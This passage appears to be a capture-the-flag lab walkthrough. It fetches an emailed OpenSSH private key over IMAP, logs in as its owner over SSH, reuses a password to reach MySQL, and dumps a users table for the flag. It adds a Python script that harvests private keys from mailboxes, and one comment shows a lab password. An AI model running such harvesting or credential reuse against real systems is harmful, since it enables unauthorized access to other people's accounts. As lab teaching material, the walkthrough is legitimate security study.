1 OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SNIPPET=FUZZY PREVIEW=FUZZY LITERAL+ NOTIFY SPECIAL-USE] Logged in
1 SELECT INBOX <---[Step 1]
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 1 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1636509064] UIDs valid
* OK [UIDNEXT 2] Predicted next UID
1 OK [READ-WRITE] Select completed (0.001 + 0.000 secs).
* 1 EXISTS
* BAD Error in IMAP command 1: Unknown command (0.001 + 0.000 secs).
a FETCH 1 BODY[] <---[Step 2]
* 1 FETCH (BODY[] {3661}

The a FETCH 1 BODY[] response was a message containing an OpenSSH private key, which would let us log in as the key's owner without a password. The message was addressed to tom@inlanefreight.htb and sat in Tom's INBOX, so the key was most likely his:

HELO dev.inlanefreight.htb
MAIL FROM:<tech@dev.inlanefreight.htb>
RCPT TO:<bob@inlanefreight.htb>
DATA
From: [Admin] <tech@inlanefreight.htb>
To: <tom@inlanefreight.htb>
Date: Wed, 10 Nov 2010 14:21:26 +0200
Subject: KEY

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAACFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAgEA9snuYvJaB/QOnkaAs92nyBKypu73HMxyU9XWTS+UBbY3lVFH0t+F
+yuX+57Wo48pORqVAuMINrqxjxEPA7XMPR9XIsa60APplOSiQQqYreqEj6pjTj8wguR0Sd
hfKDOZwIQ1ILHecgJAA0zY2NwWmX5zVDDeIckjibxjrTvx7PHFdND3urVhelyuQ89BtJ....[SNIPPET]

I copied the whole key block into a file named id_rsa on my own machine and tried to SSH in with it. The first attempt failed because ssh refuses to use a private key file that other users can read; a chmod 600 fixed that.

ssh tom@10.129.202.20 -i id_rsa 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0664 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
tom@10.129.202.20: Permission denied (publickey).
chmod 600 id_rsa

Second SSH attempt:

ssh tom@10.129.202.20 -i id_rsa
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-90-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue 25 Nov 2025 02:06:27 AM UTC

System load: 0.0 Processes: 167
Usage of /: 70.0% of 5.40GB Users logged in: 0
Memory usage: 30% IPv4 address for ens192: 10.129.202.20
Swap usage: 0%


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


Last login: Wed Nov 10 02:51:52 2021 from 10.10.14.20
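The manual steps above (IMAPS login, FETCH of the message, copying the key out, fixing its permissions) can be done in one go. The following is an added example, not code from the original walkthrough: it runs the same LOGIN / SELECT / FETCH exchange with imaplib against a server with a self-signed certificate, pulls every private-key block out of each message, and writes it with mode 0600 from the start so ssh never sees the UNPROTECTED PRIVATE KEY FILE state. The host, user and password are command-line arguments (assumed, not fixed in the code), and the embedded sample message is constructed, with a placeholder body instead of a real key.

```python
import base64
import email
import email.utils
import imaplib
import os
import re
import ssl
import stat
import tempfile
import textwrap

# Matches PEM-style private keys, including the "OPENSSH PRIVATE KEY" form seen in Tom's mail.
KEY_RE = re.compile(
    r"-----BEGIN (?P<kind>[A-Z ]*PRIVATE KEY)-----\r?\n"
    r"(?P<body>[A-Za-z0-9+/=\r\n]+?)"
    r"-----END (?P=kind)-----"
)

# Constructed sample in the shape of the message fetched above; the key body is the base64
# of a placeholder string, not a real key.
_FAKE_BODY = "\r\n".join(textwrap.wrap(
    base64.b64encode(b"constructed placeholder, not a real key").decode(), 24))
SAMPLE_MESSAGE = (
    "From: [Admin] <tech@inlanefreight.htb>\r\n"
    "To: <tom@inlanefreight.htb>\r\n"
    "Subject: KEY\r\n"
    "\r\n"
    "-----BEGIN OPENSSH PRIVATE KEY-----\r\n"
    + _FAKE_BODY + "\r\n"
    "-----END OPENSSH PRIVATE KEY-----\r\n"
)


def lab_tls_context():
    """TLS context for a self-signed lab certificate (CN=NIXHARD above). Verification is
    switched off deliberately; do not reuse this outside a lab."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def fetch_inbox(host, user, password, port=993):
    """LOGIN, EXAMINE INBOX (read-only, so fetching does not set \\Seen) and FETCH n BODY[]
    over IMAPS: the same exchange as the manual session above. Returns raw RFC 822 text."""
    messages = []
    with imaplib.IMAP4_SSL(host, port, ssl_context=lab_tls_context()) as imap:
        imap.login(user, password)
        imap.select("INBOX", readonly=True)
        _typ, data = imap.search(None, "ALL")
        for num in data[0].split():
            _typ, parts = imap.fetch(num, "(BODY[])")
            for part in parts:
                if isinstance(part, tuple):  # (b'1 (BODY[] {n}', b'<raw message>')
                    messages.append(part[1].decode("utf-8", errors="replace"))
    return messages


def addressee(raw_message):
    """Address in the To: header, i.e. the mailbox owner the key was sent to."""
    msg = email.message_from_string(raw_message)
    return email.utils.parseaddr(msg.get("To", ""))[1]


def extract_private_keys(raw_message):
    """Every private-key block in the message, CRLF (as IMAP delivers it) normalised to LF
    and a trailing newline guaranteed; an OpenSSH key without one is rejected as
    'invalid format'."""
    return [m.group(0).replace("\r\n", "\n") + "\n" for m in KEY_RE.finditer(raw_message)]


def save_key(pem, path):
    """Create the file with mode 0600 and enforce it with fchmod (covers a pre-existing file),
    then write the key. Returns the resulting permission bits."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    try:
        os.fchmod(fd, 0o600)
        os.write(fd, pem.encode())
    finally:
        os.close(fd)
    return stat.S_IMODE(os.stat(path).st_mode)


def save_key_to_tempdir(pem, name="id_rsa"):
    """Write the key into a fresh private directory; returns (path, mode)."""
    path = os.path.join(tempfile.mkdtemp(prefix="lab-key-"), name)
    return path, save_key(pem, path)


if __name__ == "__main__":
    import sys
    host, user, password = sys.argv[1:4]  # e.g. 10.129.xxx.xx tom NMds732Js2761 (assumed)
    for raw in fetch_inbox(host, user, password):
        owner = addressee(raw)
        for i, key in enumerate(extract_private_keys(raw)):
            path, mode = save_key_to_tempdir(key, f"id_{owner.split('@')[0]}_{i}")
            print(f"saved key addressed to {owner} at {path} (mode {oct(mode)})")
```

Only the offline parts (key extraction, header parsing, the 0600 write) are exercised by the self-test; the IMAPS fetch needs the lab host. The To: header is a hint about whose key it is, not proof: the SSH login succeeding is what confirms it.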

Now that we’re in, the first thing I wanted to do was examine the /opt/tom-recovery.sh file that I found earlier, which had something to do with possibly resetting accounts.

find / -name "tom-recovery.sh" 2>/dev/null

Unsurprisingly it was still at /opt/tom-recovery.sh, but it was worth confirming, since the path came from cached SNMP output that might not have been current.

These are the contents of /opt/tom-recovery.sh; it didn't leave much room to maneuver:

#!/bin/bash
# Run by the snmpd extend entry "BACKUP" as: /opt/tom-recovery.sh <user> <password>
# chpasswd reads "user:password" lines on stdin and only succeeds when run as root
echo $1:$2 | chpasswd

Remembering the main objective, the HTB user's password, I looked at /etc/passwd and /etc/shadow for that user. Neither listed it, so HTB is not a local Linux account. /etc/passwd did show a mysql service user, though, so I checked whether MySQL was actually listening:

ss -tulpn | grep 3306
tcp   LISTEN 0      151          127.0.0.1:3306          0.0.0.0:*
tcp   LISTEN 0      70          127.0.0.1:33060          0.0.0.0:*

MySQL was listening on the loopback interface only, so it was reachable now that we had a shell. I tried Tom's password from the SNMP output, and it worked: the same credential had been reused for the database account.

mysql -u tom -p

After that, I proceeded to enumerate and see what databases were present, and there was one that stood out (users).

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| users |
+--------------------+
5 rows in set (0.02 sec)
mysql> use users;
-----------------------
Database changed
mysql> show tables;
+-----------------+
| Tables_in_users |
+-----------------+
| users |
+-----------------+
1 row in set (0.01 sec)

A simple SELECT over the whole table returned the flag; filtering on the user column (assuming it is called username) works equally well:

mysql> select * from users;

OR

mysql> select * from users where username = "HTB";

Flag